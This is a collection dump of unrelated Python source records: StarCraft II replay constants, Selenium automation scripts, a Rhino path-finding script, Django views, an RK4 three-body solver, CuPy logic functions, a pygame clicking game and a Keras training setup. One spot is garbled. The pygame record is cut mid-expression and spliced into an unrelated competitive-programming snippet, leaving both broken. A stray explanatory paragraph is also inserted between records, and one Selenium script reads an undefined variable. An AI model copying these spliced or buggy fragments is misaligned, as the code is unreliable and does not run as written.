Attacks Level 2',\n 0x4802 : 'Zerg Flyer Attacks Level 3',\n 0x4902 : 'Zerg Flyer Carapace Level 1',\n 0x4a02 : 'Zerg Flyer Carapace Level 2',\n 0x4b02 : 'Zerg Flyer Carapace Level 3',\n ## Infestation pit\n 0x4c02 : 'Pathogen Glands',\n 0x7202 : 'Neural Parasite',\n ## Baneling Nest\n 0x4d02 : 'Centrifugal Hooks',\n\n #Terran\n ## Engineering bay\n 0x702 : 'Hi-Sec Auto Tracking',\n 0x802 : 'Terran Building Armor',\n 0x902 : 'Terran Infantry Weapons Level 1',\n 0xa02 : 'Terran Infantry Weapons Level 2',\n 0xb02 : 'Terran Infantry Weapons Level 3',\n 0xc02 : 'Neosteel Frame',\n 0xd02 : 'Terran Infantry Armor Level 1',\n 0xe02 : 'Terran Infantry Armor Level 2',\n 0xf02 : 'Terran Infantry Armor Level 3',\n ## Barracks tech lab\n 0x1002 : 'Nitro Packs',\n 0x1102 : 'Stimpack',\n 0x1202 : 'Combat Shields',\n 0x1302 : 'Concussive Shells',\n ## Factory tech lab\n 0x1402 : 'Siege Tech',\n 0x1502 : 'Infernal Pre-igniter',\n 0x7002 : '250mm Strike Cannons',\n ## Starport tech lab\n 0x1602 : 'Cloaking Field',\n 0x1702 : 'Caduceus Reactor',\n 0x1902 : 'Seeker Missile',\n 0x1a02 : 'Durable Materials',\n 0x4e02 : 'Corvid Reactor',\n ## Fusion Core\n 0x1802 : 'Behemoth Reactor',\n 0x4f02 : 'Weapon Refit',\n ## Ghost Academy\n 0x1b02 : 'Personal Cloaking',\n 0x1c02 : 'Moebius Reactor',\n ## Armory\n 0x1d02 : 'Terran Vehicle Plating Level 1',\n 0x1e02 : 'Terran Vehicle Plating Level 2',\n 0x1f02 : 'Terran Vehicle Plating Level 3',\n 0x2002 : 'Terran Vehicle Weapons Level 1',\n 0x2102 : 'Terran Vehicle Weapons Level 2',\n 0x2202 : 'Terran Vehicle Weapons Level 3',\n 0x2302 : 'Terran Ship Plating Level 1',\n 0x2402 : 'Terran Ship Plating Level 2',\n 0x2502 : 'Terran Ship Plating Level 3',\n 0x2602 : 'Terran Ship Weapons Level 1',\n 0x2702 : 'Terran Ship Weapons Level 2',\n 0x2802 : 'Terran Ship Weapons Level 3'\n }\n\n# TODO: Not sure if this is a complete mapping\nREGIONS = {\n # United States\n 'us': {\n 1: 'us',\n 2: 'la',\n },\n\n # Europe\n 'eu': {\n 1: 'eu',\n 2: 'ru',\n },\n\n # Korea - appear to both map to same place\n 'kr': {\n 1: 'kr',\n 2: 'tw',\n },\n # Taiwan - appear to both map to same place\n 'tw': {\n 1: 'kr',\n 2: 'tw',\n },\n\n # China - different url scheme (www.battlenet.com.cn)?\n 'cn': {\n 1: 'cn',\n },\n\n # South East Asia\n 'sea': {\n 1: 'sea',\n },\n\n # Singapore\n 'sg': {\n 1: 'sg',\n },\n\n # Public Test\n 'xx': {\n 1: 'xx',\n },\n}\n","sub_path":"sc2reader/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":9319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
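One plausible consumer of GAME_SPEED_FACTOR when working with these constants is converting the in-game clock to wall time, since the non-Normal speeds run the game clock faster or slower than real time. A hypothetical helper, not part of this module:

GAME_SPEED_FACTOR = {'Slower': 0.6, 'Slow': 0.8, 'Normal': 1.0, 'Fast': 1.2, 'Faster': 1.4}

def real_seconds(game_seconds, speed):
    # On 'Faster' the game clock ticks 1.4x as fast as wall time.
    return game_seconds / GAME_SPEED_FACTOR[speed]

print(real_seconds(840, 'Faster'))  # a 14-minute game clock is ~600s of real time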
+{"seq_id":"634338170","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\ndriver = webdriver.Chrome(executable_path=\"/Users/kztmr/Downloads/chromedriver\")\ndriver.set_window_size(500, 600)\n\ndriver.get(\"http://yvsc.jp/\")\ndriver.execute_script(\"window.scrollTo(0, 3500);\")\ntime.sleep(3)\nif EC.element_to_be_clickable('//img[@alt=\"山形銀行\"]'):\n print(\"This button is clickable.\")\n driver.find_element_by_xpath('//img[@alt=\"山形銀行\"]').click()\n","sub_path":"clickable_test.py","file_name":"clickable_test.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"603363513","text":"from selenium import webdriver\nfrom datetime import date\nimport time\n\n# Midas codes to use\ncodes = [153267,144096,153267,148165,195691,89404,590130,86443,62404,73322,220329,88892,193845,172665,171497,190359,190353,193465,210855,198089,193446,180550]\n\n# Instantiate the Python/Selenium WebDriver\nbrowser = webdriver.Ie(\"IEDriverServer.exe\")\n\n# Open the Telesales login prompt\nbrowser.get(\"http://example.com\")\ntime.sleep(5)\n\n# Login to Telesales\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_txtUserID\").send_keys(\"fgd4tfre\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_txtPassword\").send_keys(\"g44tgg\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_cmdLogin\").click()\n\n# Now find and select a customer\nbrowser.get(\"https://example.com\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_CustomerAccountTextbox\").send_keys(\"4621348\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_SelectCustomerButton\").click()\ntime.sleep(2)\n\n# Now we can start placing an order\nbrowser.get(\"https://example.com\")\ntime.sleep(2)\n\n# Run through a loop and add a product to the basket\nx=0\nproduct_num=0\nwhile (x < 30000):\n\ttry:\n\t\t# Get the page url\n\t\ty=0\n\t\twhile (y < 10):\n\t\t\tif(browser.current_url != \"\"):\n\t\t\t\tpageURL = browser.current_url\n\t\t\t\ttime.sleep(0.25)\n\t\t\ty = y + 1\n\t\t\n\t\t# Perform adding actions and error catching\n\t\t\n\t\t# Reset product choice\n\t\tif (product_num > 14):\n\t\t\tproduct_num = 0\n\t\t\n\t\t# If the total counter is a modulus of 3 then do some page navigations\n\t\t# to mix it up a little bit. Rock'n\n\t\tif (x % 5 == 0 or x % 11 == 0):\n\t\t\tbrowser.get(\"https://example.com/\")\n\t\t\ttime.sleep(15)\n\t\t\tbrowser.get(\"https://example.com/\")\n\t\t\ttime.sleep(2)\n\t\t\n\t\t# Add a midas code to the order\n\t\tbrowser.find_element_by_id(\"MidasTextbox\").click()\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"MidasTextbox\").clear()\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"MidasTextbox\").send_keys(midas_codes[product_num])\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"AddProductButton\").click()\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_UpdateSubtotalButton\").click()\n\t\ttime.sleep(2)\n\t\t\n\t\t# Increase the QTY of the product by 2\n\t\t\t# TODO\n\t\n\t# Catch errors - detect whether user has been logged out of Telesales\n\texcept Exception as inst:\n\t\ttoday = date.today()\n\t\t\n\t\t# Print header of Error Message Block in CLI\n\t\tprint ('=======================================')\n\t\t\n\t\t# Check that the user is still on the Ordering screen\n\t\tif (pageURL.lower() != \"https://example.com/\"):\n\t\t\t\n\t\t\t# Check if the user has been logged out\n\t\t\tif (pageURL.lower() == \"https://example.com/\"):\n\t\t\t\tprint ('User has been logged out!')\n\t\t\t\tprint (today)\n\t\t\t\tprint (time.strftime(\"%H:%M:%S\"))\n\t\t\t\tprint (inst)\n\t\t\t\texit()\n\t\t\t# Else: Something else is wrong with this screen. Log and exit.\n\t\t\telse:\n\t\t\t\tif (pageURL.lower() != \"https://example.com/\"):\n\t\t\t\t\tprint ('ERROR! URL has changed but not logged out!')\n\t\t\t\t\tprint (today)\n\t\t\t\t\tprint (time.strftime(\"%H:%M:%S\"))\n\t\t\t\t\tprint (inst)\n\t\t\t\t\texit()\n\t\t# Else uncaught issue. Exit\n\t\telse:\n\t\t\tprint ('Generic Error! 
Exited.')\n\t\t\tprint ('The URL did not chage, but there was an error while trying to perform the test routine.')\n\t\t\tprint (today)\n\t\t\tprint (time.strftime(\"%H:%M:%S\"))\n\t\t\tprint (inst)\n\t\t\n\t\t# Print footer of Error Message Block in CLI\n\t\tprint ('=======================================')\n\t\t\n\t\t\n\t# Sleep for 10 seconds\n\ttime.sleep(50)\n\t\n\t# Increment X\n\tx = x + 1\n\tproduct_num = product_num + 1\n\nexit()\n","sub_path":"app-pool-detector.py","file_name":"app-pool-detector.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"544415382","text":"import rhinoscriptsyntax as rs\nimport math\nimport random\nimport operator \nfrom operator import itemgetter\n\nclass Cell(object):\n def __init__(self,poly,id):\n self.poly_pts=poly\n self.id=id\n self.poly=None\n self.score=0\n def get_id(self):\n return self.id\n def gen_poly(self):\n self.poly=rs.AddPolyline(self.poly_pts)\n rs.ObjectLayer(self.poly,'ns_poly')\n return self.poly\n def del_poly(self):\n if(self.poly):\n rs.DeleteObject(self.poly)\n def get_cen(self):\n p0=self.poly_pts[0]\n p2=self.poly_pts[2]\n cen=[(p0[0]+p2[0])/2,(p0[1]+p2[1])/2,0]\n return cen\n def display(self):\n self.t=rs.AddTextDot(str(self.id)+\",\"+str(int(self.score)),self.get_cen())\n rs.ObjectLayer(self.t,'ns_textdot')\n def set_score(self,t):\n self.score=t\n def get_score(self):\n return self.score\n def getL(self):\n p0=self.poly_pts[0]\n p1=self.poly_pts[1]\n di=rs.Distance(p0,p1)\n return di\n def getW(self):\n p0=self.poly_pts[0]\n p3=self.poly_pts[3]\n di=rs.Distance(p0,p3)\n return di\n def pt_in_poly(self,p):\n poly=self.gen_poly()\n t=None\n if(rs.PointInPlanarClosedCurve(p,poly)==0):\n t=False\n else:\n t=True\n rs.DeleteObject(poly)\n return t\n\ndef genGrid(site_crv,l, w):\n srf=rs.AddPlanarSrf(site_crv)\n srfUdom=rs.SurfaceDomain(srf,0)\n srfVdom=rs.SurfaceDomain(srf,1)\n umin=srfUdom[0]\n umax=srfUdom[1]\n u=(umax-umin)/l\n #u=(umax-umin)/u_\n ustep=(umax-umin)/u\n vmin=srfVdom[0]\n vmax=srfVdom[1]\n v=(vmax-vmin)/w\n #v=(vmax-vmin)/v_\n vstep=(vmax-vmin)/v\n i=umin\n plane_cell_li=[]\n counter=0\n while imax_di):\n max_di=di\n max_id=id\n cells[max_id].set_score(100)\n\ndef buildPath(cells):\n path=[]\n path.append(cells[0])\n counter=0\n while(counter<25):\n counter+=1\n i=path[-1]\n me=i.get_cen()\n meL=i.getL()\n meW=i.getW()\n me_score=i.get_score()\n ri=[me[0]+meL,me[1],0] #ri\n le=[me[0]-meL,me[1],0] #le\n up=[me[0],me[1]+meW,0] #up\n dn=[me[0],me[1]-meW,0] #dn\n max_score=0\n score_li=[] # [ cell, score ]\n for j in cells:\n if(j not in path):\n this_score=j.get_score()\n if(j.pt_in_poly(le)==True):\n \n score_li.append([j,this_score])\n if(j.pt_in_poly(ri)==True):\n score_li.append([j,this_score])\n if(j.pt_in_poly(up)==True):\n score_li.append([j,this_score])\n if(j.pt_in_poly(dn)==True):\n score_li.append([j,this_score])\n score_li.sort(key=itemgetter(1))\n print('\\n\\n---------')\n if(len(score_li)>0):\n for j in score_li:\n print('got score= %s , this_id= %s, req_id= %s'%(j[1], i.id, j[0].id))\n r=random.randint(0,len(score_li)-1)\n req_cell=score_li[-1][0]\n next=req_cell.get_cen()\n print('accepted id %s'%(req_cell.id))\n L=rs.AddLine(me,next)\n rs.ObjectLayer(L,'ns_path')\n path.append(req_cell)\n\ndef update_matrix(cells,recursion_counter):\n for i in cells:\n me=i.get_cen()\n meL=i.getL()\n meW=i.getW()\n me_score=i.get_score()\n ri=[me[0]+meL,me[1],0] #ri\n le=[me[0]-meL,me[1],0] #le\n up=[me[0],me[1]+meW,0] #up\n dn=[me[0],me[1]-meW,0] #dn\n max_score=0\n score_li=[]\n for j in cells:\n this_score=j.get_score()\n this=j.get_cen()\n di=rs.Distance(this,me)\n if(j.pt_in_poly(le)==True):\n score_li.append(this_score)\n if(j.pt_in_poly(ri)==True):\n score_li.append(this_score)\n if(j.pt_in_poly(up)==True):\n score_li.append(this_score)\n if(j.pt_in_poly(dn)==True):\n score_li.append(this_score)\n r=random.randint(0,10)\n if(r>3):\n for j in score_li:\n if(j>max_score):\n max_score=j\n else:\n if(len(score_li)>1):\n r=random.randint(0,len(score_li)-1)\n max_score=score_li[r]\n else:\n max_score=j\n if(max_score>i.get_score()):\n 
i.set_score(max_score*0.85)\n sum=0\n for i in cells:\n me=i.get_cen()\n #rs.AddTextDot(i.get_score(),me)\n if(me==0):\n sum+=1\n if(recursion_counter<10 and sum<5):\n recursion_counter+=1\n #print('recursion')\n update_matrix(cells,recursion_counter)\n else:\n for i in cells:\n me=i.get_cen()\n i.display()\n\n\nrs.EnableRedraw(False)\n\n\nlyr_poly=rs.AddLayer('ns_poly')\nlyr_textdot=rs.AddLayer('ns_textdot')\nlyr_path=rs.AddLayer('ns_path')\n\nSITE_CRV=rs.GetObject('pick site curve')\nCELL_LI=genGrid(SITE_CRV,45,45)\ninitPath(CELL_LI)\nupdate_matrix(CELL_LI,0)\nbuildPath(CELL_LI)\n\n\nrs.EnableRedraw(True)","sub_path":"demo_path_finder.py","file_name":"demo_path_finder.py","file_ext":"py","file_size_in_byte":6132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"217904512","text":"from django.shortcuts import render, render_to_response\nfrom django.forms.models import modelformset_factory\nfrom django.template import RequestContext\n\nfrom lugares.models import Lugar\n\n#Consultar lugares\ndef consultar_lugares(request):\n\tlugares = Lugar.objects.all()\n\treturn render(request, 'consultas/consultLugares.html', {'lugares': lugares})\n\n#Agregar lugar\ndef add_lugar(request):\n LugarFormSet = modelformset_factory(Lugar)\n if request.method == 'POST':\n formset = LugarFormSet(request.POST, request.FILES)\n if formset.is_valid():\n formset.save()\n return consultar_lugares(request)\n else:\n formset = LugarFormSet(queryset=Lugar.objects.none())\n \n return render(request, \"agregar/agregarLugar.html\", {\n \"formset\": formset,\n })\n\n","sub_path":"clei/lugares/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"416681281","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# RK4 step at y, with step size h and derivative f(y,x)\ndef rk4_step(f, y, x, h, m=[1.,1.,1.,]):\n k1 = h * f(x, y, m)\n k2 = h * f(x, y + k1 / 2, m)\n k3 = h * f(x, y + k2 / 2, m)\n k4 = h * f(x, y + k3, m)\n \n y_step = y + k1 / 6 + k2 / 3 + k3 / 3 + k4 / 6\n x_step = x + h\n return y_step, x_step\n\ndef rk4_driver(f, y0, x_end, h, m=[1.,1.,1.,], control=None):\n n = int(x_end / h)\n y = np.zeros((n+1,) + y0.shape)\n x = np.zeros(n+1)\n y[0] = y0\n x[0] = 0.\n\n if control!=None:\n for i in range(n):\n y[i+1], x[i+1] = rk4_step(f, y[i], x[i], h)\n if not control(y[i+1]):\n break;\n else:\n for i in range(n):\n y[i+1], x[i+1] = rk4_step(f, y[i], x[i], h)\n\n return y, x\n\n# gravitational acceleration of one body influenced by another body\ndef a2(r0, r1, m1):\n acc = m1 * (r1 - r0) / np.linalg.norm(r0 - r1)**3\n return acc\n\n# gravitational acceleration of one body influenced by two other bodies\ndef a3(r0, r1, r2, m0, m1, m2):\n acc = a2(r0, r1, m1) + a2(r0, r2, m2)\n return acc\n\n# derivative for 3-body problem, default are all masses equal 1\n# y is a (6,2) vector with y[0::2] being the positions and y[1::2] being the velocities in two dimensions\ndef three_body(t, y, m=[1.,1.,1.,]):\n dy = np.zeros(y.shape)\n dy[::2] = y[1::2]\n\n dy[1] = a3(y[0], y[2], y[4], m[0], m[1], m[2])\n dy[3] = a3(y[2], y[0], y[4], m[1], m[0], m[2])\n dy[5] = a3(y[4], y[0], y[2], m[2], m[0], m[1])\n \n return dy\n","sub_path":"tutorial03/three_body_rk4.py","file_name":"three_body_rk4.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"17712245","text":"import cupy\nfrom cupy.core import _routines_logic as _logic\nfrom cupy.core import fusion\n\n\ndef all(a, axis=None, out=None, keepdims=False):\n \"\"\"Tests whether all array elements along a given axis evaluate to True.\n\n Args:\n a (cupy.ndarray): Input array.\n axis (int or tuple of ints): Along which axis to compute all.\n The flattened array is used by default.\n out (cupy.ndarray): Output array.\n keepdims (bool): If ``True``, the axis is remained as an axis of\n size one.\n\n Returns:\n cupy.ndarray: An array reduced of the input array along the axis.\n\n .. seealso:: :func:`numpy.all`\n\n \"\"\"\n if fusion._is_fusing():\n if keepdims:\n raise NotImplementedError(\n 'cupy.all does not support `keepdims` in fusion yet.')\n return fusion._call_reduction(\n _logic.all, a, axis=axis, out=out)\n\n assert isinstance(a, cupy.ndarray)\n return a.all(axis=axis, out=out, keepdims=keepdims)\n\n\ndef any(a, axis=None, out=None, keepdims=False):\n \"\"\"Tests whether any array elements along a given axis evaluate to True.\n\n Args:\n a (cupy.ndarray): Input array.\n axis (int or tuple of ints): Along which axis to compute all.\n The flattened array is used by default.\n out (cupy.ndarray): Output array.\n keepdims (bool): If ``True``, the axis is remained as an axis of\n size one.\n\n Returns:\n cupy.ndarray: An array reduced of the input array along the axis.\n\n .. seealso:: :func:`numpy.any`\n\n \"\"\"\n if fusion._is_fusing():\n if keepdims:\n raise NotImplementedError(\n 'cupy.any does not support `keepdims` in fusion yet.')\n return fusion._call_reduction(\n _logic.any, a, axis=axis, out=out)\n\n assert isinstance(a, cupy.ndarray)\n return a.any(axis=axis, out=out, keepdims=keepdims)\n\n\ndef in1d(ar1, ar2, assume_unique=False, invert=False):\n \"\"\"Tests whether each element of a 1-D array is also present in a second\n array.\n\n Returns a boolean array the same length as ``ar1`` that is ``True``\n where an element of ``ar1`` is in ``ar2`` and ``False`` otherwise.\n\n Args:\n ar1 (cupy.ndarray): Input array.\n ar2 (cupy.ndarray): The values against which to test each value of\n ``ar1``.\n assume_unique (bool, optional): Ignored\n invert (bool, optional): If ``True``, the values in the returned array\n are inverted (that is, ``False`` where an element of ``ar1`` is in\n ``ar2`` and ``True`` otherwise). Default is ``False``.\n\n Returns:\n cupy.ndarray, bool: The values ``ar1[in1d]`` are in ``ar2``.\n\n \"\"\"\n # Ravel both arrays, behavior for the first array could be different\n ar1 = ar1.ravel()\n ar2 = ar2.ravel()\n if ar1.size == 0 or ar2.size == 0:\n if invert:\n return cupy.ones(ar1.shape, dtype=cupy.bool_)\n else:\n return cupy.zeros(ar1.shape, dtype=cupy.bool_)\n\n shape = (ar1.size, ar2.size)\n ar1_broadcast = cupy.broadcast_to(ar1[..., cupy.newaxis], shape)\n ar2_broadcast = cupy.broadcast_to(ar2, shape)\n count = (ar1_broadcast == ar2_broadcast).sum(axis=1)\n if invert:\n return count == 0\n else:\n return count > 0\n\n\ndef isin(element, test_elements, assume_unique=False, invert=False):\n \"\"\"Calculates element in ``test_elements``, broadcasting over ``element``\n only. Returns a boolean array of the same shape as ``element`` that is\n ``True`` where an element of ``element`` is in ``test_elements`` and\n ``False`` otherwise.\n\n Args:\n element (cupy.ndarray): Input array.\n test_elements (cupy.ndarray): The values against which to test each\n value of ``element``. 
This argument is flattened if it is an\n array or array_like.\n assume_unique (bool, optional): Ignored\n invert (bool, optional): If ``True``, the values in the returned array\n are inverted, as if calculating element not in ``test_elements``.\n Default is ``False``.\n\n Returns:\n cupy.ndarray, bool:\n Has the same shape as ``element``. The values ``element[isin]``\n are in ``test_elements``.\n \"\"\"\n return in1d(element, test_elements, assume_unique=assume_unique,\n invert=invert).reshape(element.shape)\n","sub_path":"cupy/logic/truth.py","file_name":"truth.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"188123296","text":"import pygame\nimport numpy as np\nfrom pygame.draw import *\nfrom random import randint\npygame.init()\n\nFPS = 60\nscreen = pygame.display.set_mode((1200, 800))\nscreen.fill((255,255,255))\n\n'''\nСчитываем все, что есть в файле с рекордами, чтобы презаписать и не потерять\n'''\nf=open('records.txt', 'r')\nbase=f.read()\nf.close()\nname=input('Your nickname: ')\n\n'''\nСоздаем все нужные цвета, массивы, переменные\n'''\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMAGENTA = (255, 0, 255)\nCYAN = (0, 255, 255)\nBLACK = (0, 0, 0)\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\ns=0\nballs=[]\nlemmys=[]\n\nclass Ball:\n '''\n Создаем класс шаров\n '''\n def __init__(self,screen,x,y,dx,dy,r,g,color):\n '''\n Инициализируем переменные шаров:\n x,y - начальные координаты\n dx,dy - скорости по x и y соответственно\n r - радиус шарика\n g - параметр отображения и попадания\n color - цвет шарика\n '''\n self.screen = screen\n self.x = randint(100, 1100)\n self.y = randint(100, 700)\n self.dx = randint(1,10)\n self.dy = randint(1,10)\n self.r = randint(10, 100)\n self.g = True\n self.color = COLORS[randint(0, 5)]\n \n def draw(self):\n '''\n Рисуем шарик\n '''\n circle(self.screen, self.color, (self.x, self.y), self.r)\n \n def move(self):\n '''\n Двигаем шарик, на месте того, по которому попали, создаем новый, предварительно удалив старый.\n '''\n if self.g:\n self.x+=self.dx\n self.y+=self.dy\n else:\n balls.remove(self)\n x = randint(100, 1100)\n y = randint(100, 700)\n dx = randint(1,10)\n dy = randint(1,10)\n r = randint(10, 100)\n g = True\n color = COLORS[randint(0, 5)]\n balls.append(Ball(screen,x,y,dx,dy,r,g,color))\n \n def hit(self):\n '''\n Обрабатываем попадание по шарику\n '''\n self.g = False\n \n def collision(self):\n '''\n Обрабатываем столкновение шарика со стенами\n '''\n if self.x>=1200-self.r or self.x<=self.r:\n self.dx*=-1\n if self.y>=800-self.r or self.y<=self.r:\n self.dy*=-1\n \nclass Hellraiser:\n '''\n Создаем класс хеллрейзеров\n '''\n def __init__ (self,screen,x,y,r,v,g,a):\n '''\n Инициализируем переменные:\n x,y - координаты центра, вокруг которого он вращается\n r - радиус вращения\n v - скорость движения\n g - параметр отображения и попадания\n a - начальный угол поворота\n '''\n self.x = randint(300, 900)\n self.y = randint(300, 500)\n self.r = randint(100,500)\n self.v = randint(10,50)\n self.g = True\n self.a = randint(0,100)*2*np.pi\n\n def draw(self):\n '''\n Рисуем буйного\n '''\n polygon(screen,(255,141,11),[(self.x+self.r*np.sin(self.a),self.y+self.r*np.cos(self.a)),\n (self.x+(self.r+35)*np.sin(self.a)-20*np.cos(self.a),self.y+(self.r+35)*np.cos(self.a)+20*np.sin(self.a)),\n (self.x+(self.r+35)*np.sin(self.a)+20*np.cos(self.a),self.y+(self.r+35)*np.cos(self.a)-20*np.sin(self.a))])\n\n def move(self):\n '''\n Двигаем шабутного, удаляем того, по которому попали,создаем вместо него нового \n '''\n if self.g:\n self.a+=self.v/self.r\n else:\n lemmys.remove(self)\n x = randint(300, 900)\n y = randint(300, 500)\n r = randint(100,500)\n v = randint(10,50)\n g = True\n a = randint(0,100)*2*np.pi\n lemmys.append(Hellraiser(screen,x,y,r,v,g,a))\n\n def hit(self):\n '''\n Обрабатываем попадание по дикому\n '''\n self.g = False\n\n def collision(self):\n '''\n Обрабатываем cтолкновение бешеного со стенами\n '''\n if self.x+self.r*np.sin(self.a) >= 1200 or self.x+self.r*np.sin(self.a) <= 0:\n self.v *= -1\n if self.y+self.r*np.cos(self.a) >= 800 or self.y+self.r*np.cos(self.a) <= 0:\n self.v 
*= -1\n \n'''\nСоздаём пять шариков\n'''\nfor i in range(5):\n x = randint(100, 1100)\n y = randint(100, 700)\n dx = randint(1,10)\n dy = randint(1,10)\n r = randint(10, 100)\n g = True\n color = COLORS[randint(0, 5)]\n balls.append(Ball(screen,x,y,dx,dy,r,g,color))\n\n'''\nСоздаём двух восставших из ада\n'''\nfor i in range(2):\n x = randint(300, 900)\n y = randint(300, 500)\n r = randint(100,500)\n v = randint(10,50)\n g = True\n a = randint(0,100)*2*np.pi\n lemmys.append(Hellraiser(screen,x,y,r,v,g,a))\n\n \n\nclock = pygame.time.Clock()\nfinished = False\n\nwhile not finished:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n '''\n Записываем при выходе из игры никнейм и счет в файл \n '''\n F=open('records.txt', 'w')\n F.write(base)\n F.write(str(name)+': '+str(s)+'\\n')\n F.close()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n '''\n Создаем надпись Click! в месте нажатия мышкой\n '''\n f1 = pygame.font.Font(None, 50)\n text1 = f1.render('Click!', True,RED)\n screen.blit(text1,(event.pos[0]-45,event.pos[1]))\n '''\n Обрабатываем попадание по шарику, подсчитываем очки\n '''\n for ball in balls:\n if (event.pos[0]-ball.x)**2+(event.pos[1]-ball.y)**21:\r\n count = k-1\r\n if k>n:\r\n m = (k-n-1)//(n-1) + 1\r\n count += m*(2*(k-n)-(m-1)*(n-1))//2\r\n print(count%(10**9+7))\r\n","sub_path":"python/CHFING.py","file_name":"CHFING.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"379076210","text":"from settings import *\r\nfrom keras.models import Sequential\r\nfrom keras import regularizers\r\nfrom keras.layers import Input, RepeatVector\r\nfrom keras.models import Model\r\nfrom keras.layers.recurrent import LSTM, GRU\r\nfrom keras.layers import TimeDistributed\r\nfrom keras.layers import Dense, Activation\r\nfrom keras.layers.embeddings import Embedding\r\nfrom keras.optimizers import RMSprop, Adam\r\nfrom keras.utils import to_categorical\r\nfrom keras.layers.wrappers import Bidirectional\r\nfrom random import shuffle\r\nimport progressbar\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nimport _pickle as pickle\r\nimport time\r\nimport data_class\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.utils import class_weight\r\n\r\nimport tensorflow as tf\r\nfrom keras.backend.tensorflow_backend import set_session\r\nimport pretty_midi as pm\r\nimport sys\r\n\r\nfrom matplotlib2tikz import save as tikz_save\r\n\r\nfrom import_midi import import_midi_from_folder\r\n\r\n\r\nmodel_path = 'models/velocityclustering/'\r\nmodel_filetype = '.pickle'\r\n\r\ninput_dim = 1\r\nverbose = False\r\nshow_plot = False\r\nsave_plot = True\r\nlstm_size = 256\r\nbatch_size = 512\r\nlearning_rate = 0.00002 #1e-06\r\nstep_size = 1\r\nsave_step = 10\r\nshuffle_train_set = True\r\nbidirectional = False\r\nembedding = False\r\noptimizer = 'Adam'\r\nactivity_regularizer = None\r\nreset_states = True\r\nnum_layers = 2\r\ntest_step = 1\r\n\r\nscale_velocity_between_0_and_1 = False\r\n\r\n#wheter to set the velocity to 1 everywhere where it is > 1\r\n#by comparing this test accuracy with the evaluation without this\r\n# you can see how much influence the actual velocity info has\r\nonly_train_note_starts = False\r\n#function that runs over V if only_train_note_starts\r\ndef set_to_1_if_nonzero(V):\r\n V_normalized = np.copy(V)\r\n for sample in range(V.shape[0]):\r\n for step in range(V.shape[1]):\r\n if V[sample, step,0] > 0:\r\n V_normalized[sample, step, 0] = 1\r\n return V_normalized\r\n\r\n\r\nprint('loading data...')\r\n# Get Train and test sets\r\n\r\n\r\nfolder = source_folder\r\n\r\nV_train, V_test, D_train, D_test, T_train, T_test, I_train, I_test, Y_train, Y_test, X_train, X_test, C_train, C_test, train_paths, test_paths = import_midi_from_folder(folder)\r\n\r\ntrain_set_size = len(X_train)\r\ntest_set_size = len(X_test)\r\n\r\n\r\nprint(len(train_paths))\r\nprint(len(test_paths))\r\nprint(C_test)\r\n\r\n\r\nclass_string = ''\r\nfor class_name in classes:\r\n class_string += class_name\r\n\r\nfd = {'highcrop': high_crop, 'lowcrop':low_crop, 'lr': learning_rate, 'opt': optimizer,\r\n'bi': bidirectional, 'lstm_size': lstm_size, 'trainsize': train_set_size, \r\n'testsize': test_set_size, 'input_length': input_length, 'reset_states': reset_states, \r\n'num_layers':num_layers, 'only_train_note_starts': only_train_note_starts, \r\n'velocity_threshold_such_that_it_is_a_played_note': velocity_threshold_such_that_it_is_a_played_note, \r\n'scale': scale_velocity_between_0_and_1, 'classes': class_string}\r\nt = str(int(round(time.time())))\r\nmodel_name = t+'-num_layers_%(num_layers)s_maxlen_%(input_length)s_otns_%(only_train_note_starts)s_lstmsize_%(lstm_size)s_trainsize_%(trainsize)s_testsize_%(testsize)s_thresh_%(velocity_threshold_such_that_it_is_a_played_note)s_scale_%(scale)s_classes_%(classes)s' % fd\r\n\r\nmodel_path = model_path + model_name + '/'\r\nif not 
